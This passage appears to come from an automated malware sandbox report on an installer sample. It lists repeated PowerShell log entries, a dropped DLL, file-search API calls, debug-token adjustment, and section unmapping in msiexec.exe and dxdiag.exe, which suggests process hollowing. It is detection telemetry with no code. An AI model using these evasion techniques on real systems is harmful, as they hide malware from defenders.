Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9900
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\nsExec.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose | 0_2_00405A4F
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_00406620 FindFirstFileA,FindClose | 0_2_00406620
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Code function: 0_2_004027CF FindFirstFileA | 0_2_004027CF
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | API call chain: ExitProcess graph end node | graph_0-3687
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: unknown base address: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
